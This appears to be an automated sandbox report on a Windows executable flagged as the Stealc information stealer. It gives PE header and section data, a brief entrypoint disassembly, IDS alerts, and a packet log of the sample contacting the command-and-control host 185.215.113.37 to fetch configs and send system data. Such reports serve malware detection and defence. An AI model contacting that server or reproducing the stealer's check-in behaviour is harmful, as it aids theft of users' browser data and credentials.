SSDEEP:	24576:td9sRDIxHtCCp0Bb+5jcmQqBpYFOvitxpJGnxqRJT0w275xtuLgRfbGQ5a+kyUY:tDs6HwG0wc+pYFOv2p4nYR+xzt00zdk
TLSH:	8A8533A975A82E28CE7E493B9049D3B9E7FE57210E23C5814D7138F58B37270E9E7640
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa9c000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F81D5125EBAh
prefetchT2 byte ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F81D5127EB5h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ch
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	9b21fc79a0765cb2c8106d3e0f5756bf	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29f000	0x200	d66a0dc4bc24c113f38cf588d096f061	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mvntvbkx	0x4fd000	0x19e000	0x19d800	a4d6cff656cf604bf8f566898cd0f822	False	0.9948532676466143	data	7.953641960811606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sfdfhbqa	0x69b000	0x1000	0x400	cab894d842b5ac0bfc6b33c601033b24	False	0.7919921875	data	6.150514747175866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x69c000	0x3000	0x2200	f00cc8855064d40ed8a7b54889fafb6a	False	0.05710018382352941	DOS executable (COM)	0.7048197800608376	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-28T21:26:07.289260+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:07.516287+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:07.522916+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49732	TCP
2024-09-28T21:26:07.743185+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:07.749461+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49732	TCP
2024-09-28T21:26:08.840893+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:09.066691+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:14.327749+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:15.449025+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:16.215552+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:16.621356+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:18.529237+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49732	185.215.113.37	80	TCP
2024-09-28T21:26:18.928495+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49732	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 21:26:06.321454048 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:06.326514959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:06.326611996 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:06.326740980 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:06.331971884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.046447992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.046582937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.049501896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.054431915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.289165974 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.289259911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.290441990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.295299053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.516190052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.516287088 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.516303062 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.516355991 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.517846107 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.522916079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743117094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743129015 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743161917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743185043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.743185997 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.743248940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743261099 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743271112 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.743298054 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.743468046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743478060 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743486881 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743496895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.743525028 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.743525028 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.743577957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.744673014 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.749460936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.969059944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.969240904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.985903025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.985949039 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:07.990655899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.990717888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.990731001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.990789890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.990833044 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.990936995 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:07.990967035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:08.840781927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:08.840893030 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:08.841460943 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:08.848983049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.066611052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.066633940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.066644907 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.066690922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.066692114 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.066699028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.066711903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.066723108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.066735983 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.066771984 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.066771984 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.066771984 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.066826105 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.067500114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.067559958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.067565918 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.067572117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.067601919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.067605019 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.067636967 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.067657948 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.068206072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.068217993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.068228006 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.068262100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.068311930 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.190633059 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.190660000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.190675020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.190684080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.190762997 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.190805912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.190810919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.190865040 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.190958977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191006899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191030025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.191056967 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.191087008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191148043 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.191232920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191293001 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.191332102 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191342115 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191363096 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191401958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.191435099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.191750050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191800117 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.191840887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191850901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191898108 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.191937923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191947937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.191957951 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.192008972 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.192008972 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.192697048 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.192750931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.192760944 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.192766905 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.192797899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.192817926 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.192876101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.192887068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.192894936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.192924976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.192955017 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.193675995 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.193727016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.193737984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.193751097 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.193783998 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.193783998 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.315493107 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315553904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315563917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315570116 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.315665960 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.315671921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315682888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315691948 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315701962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315732002 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.315783978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.315841913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315900087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.315937996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.315947056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316004038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.316097975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316112041 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316154957 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.316195965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316205978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316215038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316222906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316234112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316250086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.316281080 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.316440105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316451073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.316498041 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.316987038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317034960 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317043066 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.317044020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317074060 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.317106009 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.317186117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317197084 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317203999 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317214966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317243099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.317272902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.317373991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317384005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317426920 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.317985058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.317995071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318044901 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.318084955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318095922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318109035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318121910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318139076 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.318171978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.318171978 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.318273067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318284988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318298101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318329096 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.318358898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.318896055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318941116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318950891 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.318950891 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.318983078 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.319013119 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.319087982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.319097996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.319107056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.319118023 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.319145918 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.319176912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.319269896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.319279909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.319315910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.319346905 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.439956903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.439970016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.439985991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.439996004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440010071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440020084 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440032005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440035105 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440035105 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440083981 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440190077 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440226078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440243959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440263987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440272093 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440273046 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440284014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440304995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440304995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440330029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440543890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440727949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440778971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440845966 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440857887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440871954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:09.440907955 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:09.440936089 CEST	49732	80	192.168.2.4	185.215.113.37
